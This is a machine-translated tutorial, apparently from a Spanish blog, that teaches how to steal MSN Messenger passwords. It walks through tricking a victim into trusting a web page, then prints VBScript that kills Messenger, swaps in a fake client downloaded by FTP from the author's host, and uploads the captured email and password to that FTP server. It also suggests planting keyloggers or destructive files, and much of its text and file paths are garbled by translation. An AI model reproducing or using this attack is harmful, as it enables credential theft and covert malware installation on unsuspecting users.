如何从 MSN Messenger 中获取密码 (拥有并工作)
如果您厌倦了下载无法运行的程序或被防病毒软件检测到的该死的特洛伊木马 “客户端 PC”… 您已找到所需内容, 一种以最干净的方式获取密码的方法, 什么更重要, 不要让他们知道. 实现这一目标的方法有些复杂,但同时也很简单, 这就像其他一切一样, 通心粉或自制的东西, 但它有效, 它总结为几个部分. 我通过我制作的 Visual Basic 程序实现了这一点, 使用 Web 和 FTP. 顺便说一句,如果你有点聪明,你会意识到通过本文档的第一部分,你可以把任何文件放在你的磁盘上,并放在你想要的路径上, 例如,在 “C:文档和设置所有用户开始菜单程序主页” 这是一个用你的头脑并在其中放置键盘记录器的问题, 一个删除内容的文件… (有坏主意不是我的事) ;}
要求:
– 网页服务器.
– FTP 服务器.
问题是用户连接到一个网站并无意中下载了一个假的 Messenger (除了进入网站之外,什么都不做). 何时要使用 MSN, 一个假的跳出来, 这与 Good 相同, linnet 输入了密码,而 MSN 给了他一个错误: “现在无法连接, 等等, 等等…”, 当您按下任何按钮时 (重试, 取消, 关闭时..) MSN 打开并连接; 最终用户不知道他们的凭证已输入到 FTP 服务器中 (使用您的电子邮件 + contraseña) 当一切都在发生时. 最后,感染者的 PC 上没有留下任何痕迹.
我们需要采取的步骤 (像小火炬手):
第一, 我们将本网站放置在我们的 Web 服务器上的某个位置 (它不一定是我们的 Web 服务器, 可以来自 Terra…), 就是这个 ejemplo.html. 如果我们使用 IIS 服务器,那么我们将其保留在 C 语言中:inetpubwwwroot 或者如果它是 apache,则在 /var/www/html/xxxx 中, 如果是另一台服务器,那么无论在哪里.
第二, 在 FTP 服务器上,我们将这两个文件放在 msnmsgr.exe (VB 源代码 – 这里) 和 tmp.exe (VB 源代码 – 这里) 在 FTP 的根目录.
第三, 一旦用户已经进入虾并连接到我们的网站, 如果您下载了错误的 Messenger 并尝试连接到我们的 FTP,则会出现一个文件,其中包含您的 Windows 登录名,后跟扩展名 “.MSN 系列”, 如果您使用记事本打开它,您将看到类似:
|
用户 msn
信使 Put c:马诺利托.msn 退出 锯*****@ho*****.c噢 passworddelpanoli |
最终用户步骤 (示范):
唯一奇怪的事情 (可疑) 用户必须做的是作为受信任的站点进入我们的网站, 但这很容易被骗, 告诉他,例如,可以看到这个团伙的网站,或者它必须像那样…
如果您打开该网站,它会在下面显示错误, 然后他被告知,为了让它起作用,他把它放进去 “受信任的站点”, 在这种情况下,我告诉他打开 “HTTP 协议://www.bujarra.com/ejemplo.html” 但是每个人都可以将他们的 html 放在他们想要的任何位置.
不错, 你向他解释这一点,或者你向他解释, 他应该去 “工具” > “Internet 选项…”
到 “安全” 和 “网站…”
您必须取消选中下面的复选框 (1) 并上升 (2) 您必须输入您的网站名称,然后单击 “加” 和 Accept All Screens.
然后你会得到这个, 你告诉他这很正常’ 他给予 “是的”, 一个朋友告诉我… “只是用户并不傻”, 以及应该回答什么… “不傻, 笨”.
不错, 一旦您自动进入网站,您将发生以下情况:
– 这 “msnmsgr.exe” original 已重命名为 “msnmsgr.old”.
– 一个名为 “msnmsgr.exe”.
– 它也是从名为 “tmp.exe”
然后, 当用户打开其 MSN 时 (如果他打开了它,请不要担心,因为他以 kill 关闭,所以他让我将 .exe 重命名为 .tmp) 这是:
当您第一次打开 MSN Messenger 时,它会打开,它尽可能类似于假 MSN, 用户将像往常一样点击 “登录” 或 “文件” > “登录…”
它会要求提供电子邮件和密码,如果它通常不要求提供,那么这次它会 (给他), 这看起来是不是很真实?? 呵呵, 通过给予 “接受” 将弹出以下错误:
在这里,无论您提供什么,它都将被关闭,用户名和密码将被发送到我们指示的 FTP,稍后 (半秒) 这个假 MSN 将被关闭,新的 MSN 将打开,
正如你所看到的,下面的小图标已经像往常一样移动了…
如果我们连接到 FTP,我们将看到有一个带有用户登录名的 .msn 文件,如果我们使用记事本编辑它,我们将看到他们的电子邮件和密码.
简直令人惊叹.
附言: 不用说,每个人都必须在 HTML/Visual Basic 代码中修改 FTP 服务器,即, 与哪个用户, 使用哪个密码… 如果您使用此过程的可执行文件执行此作,您唯一能实现的就是将它们放入我的 FTP 中, 我不在乎的事情, 您将能够使用相同的用户名/密码查看它们 (MSN/信使).
需要修改的内容, 稍有解释 + AKI 技术下降:
不错, 一旦您了解了它的工作原理,如果您想自己使用它, 您必须使用 Visual Basic 6.0 编辑上一个网站上提供的源代码. 以下是您需要修改的参数,以使其适用于您的网站和 ftp 站点 (包括用户名和密码).
修改 [HTML全文] 在 Web 上 ejemplo.html,
首先,您为 HTML 指定另一个名称, 不要把它当作一个例子,我把它说我知道, 几张照片, 欺骗最终用户的东西. 这将是出现的脚本, 例如,您使用记事本对其进行编辑并修改 只 中的 value 红:
| … <脚本语言=”VBScript” 类型=”文本/VBScript”> Option Explicit Dim objShell 设置 objShell = CreateObject(“WScript.Shell”) objShell.Run “%comspec% /c tskill MSNMSGR” ,0 <– 此 MSDOS 命令会终止 (如果您已激活) MSN Messenger. objShell.Run “%comspec% /c 副本 ” & 中国(34) & “C:程序文件MSN Messengermsnmsgr.exe” & 中国(34) & ” ” & 中国(34) & “C:MSN Messengermsnmsgr.old 程序文件” & 中国(34), 0 <– 这将重命名 MSN 可执行文件 objShell.Run “%comspec% /c echo 用户 MSN 系列> c:ftp.txt”, 0 <– 在 C 中创建: 一个临时文件,然后通过 FTP 运行并上传该数据, 这就是 FTP 用户参与的地方, 修改. objShell.Run “%comspec% /c 回声 信使>> c:ftp.txt”, 0 <– 现在在临时文件中输入 FTP 密码. objShell.Run “%comspec% /c echo get tmp.exe ” & 中国(34) & “C:Program FilesMSN Messengertmp.exe” & 中国(34) & “>> c:ftp.txt”, 0 <– 它tmp.exe清理受害者的 PC 上的“测试”. objShell.Run “%comspec% /c echo get msnmsgr.exe ” & 中国(34) & “C:程序文件MSN Messengermsnmsgr.exe” & 中国(34) & “>> c:ftp.txt”, 0 <– 通过这个 MSDOS 命令,可以得到恶性 MSN, 呵呵. objShell.Run “%comspec% /c 回声退出>> c:ftp.txt”, 0 <– 使用 QUIT 结束 FTP 会话. objShell.Run “%comspec% /c ftp -n -s:C:ftp.txt www.bujarra.com“, 0 <– 现在剩下的就是执行 FTP 连接命令, 当您打开网站时,它将这样做.WScript.退出 </脚本> … |
不错, 现在由 VBasic 修改, 修改 只 中的文字 红 然后记住 编译 并将其从 FTP 挂起:
|
msnhhh.vbp 的 Form2 专用 Sub cmdAceptar_Click() |
请记住,这些文件的源代码在 AKI 中可用: msnmsgr.exe 和 tmp.exe
